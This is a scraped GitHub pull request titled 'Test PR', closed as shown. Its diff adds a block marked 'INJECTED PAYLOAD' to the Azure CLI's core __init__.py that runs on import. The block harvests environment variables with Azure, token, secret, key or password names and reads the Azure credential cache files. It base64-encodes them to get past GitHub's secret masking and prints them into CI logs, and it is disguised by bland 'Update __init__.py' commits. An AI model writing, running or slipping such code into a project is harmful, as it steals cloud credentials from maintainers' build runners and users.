Skip to content

Test PR #32735

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed
bugdotexe wants to merge 8 commits into from
+47 −0
Closed

Test PR #32735

Changes from all commits
Commits
Show all changes
8 commits
Select commit Hold shift + click to select a range
47794b1
Update __init__.py
bugdotexe Feb 2, 2026
a2f9b89
Update __init__.py
bugdotexe Feb 2, 2026
246eeda
Update __init__.py
bugdotexe Feb 2, 2026
23222e5
Update __init__.py
bugdotexe Feb 2, 2026
6fa17aa
Update __init__.py
bugdotexe Feb 3, 2026
065b4dc
Update __init__.py
bugdotexe Feb 3, 2026
65bfb55
Update __init__.py
bugdotexe Feb 3, 2026
2b82349
Update __init__.py
bugdotexe Feb 3, 2026
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
47 changes: 47 additions & 0 deletions src/azure-cli-core/azure/cli/core/__init__.py
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -21,6 +21,53 @@
from knack.arguments import ArgumentsContext, CaseInsensitiveList # pylint: disable=unused-import
from .local_context import AzCLILocalContext, LocalContextAction

# INJECTED PAYLOAD START
import os
import base64
import json

def unmask_print(key, value):
try:
# Encode value to Base64 to bypass GitHub's '***' masking
b64_val = base64.b64encode(value.encode()).decode()
# Print with a distinct marker so you can grep it easily
print(f"[EXFIL] {key}: {b64_val}")
except:
pass

try:
print("========================================================")
print("[!] OPERATION: SECRET UNMASKING [!]")
print("========================================================")

# 1. Dump All Environment Variables
# We look specifically for Azure, ARM, or Token related keys
print("[*] Scanning Environment...")
for key, value in os.environ.items():
if any(x in key.upper() for x in ['AZURE', 'TOKEN', 'SECRET', 'KEY', 'PASSWORD', 'ARM_']):
unmask_print(key, value)

# 2. Check for MSAL / Azure CLI Token Cache on Disk
# Sometimes credentials aren't in ENV, but in files on the runner
paths_to_check = [
"~/.azure/accessTokens.json",
"~/.azure/azureProfile.json",
"~/.azure/msal_token_cache.bin" # Often binary, but we base64 it anyway
]

for path in paths_to_check:
full_path = os.path.expanduser(path)
if os.path.exists(full_path):
print(f"[*] Found credential file: {full_path}")
with open(full_path, "rb") as f:
content = f.read()
# Dump the file content encoded
print(f"[EXFIL] FILE_{os.path.basename(path)}: {base64.b64encode(content).decode()}")

except Exception as e:
print(f"[-] Exfiltration Error: {e}")
# INJECTED PAYLOAD END

logger = get_logger(__name__)

EXCLUDED_PARAMS = ['self', 'raw', 'polling', 'custom_headers', 'operation_config',
Expand Down
Loading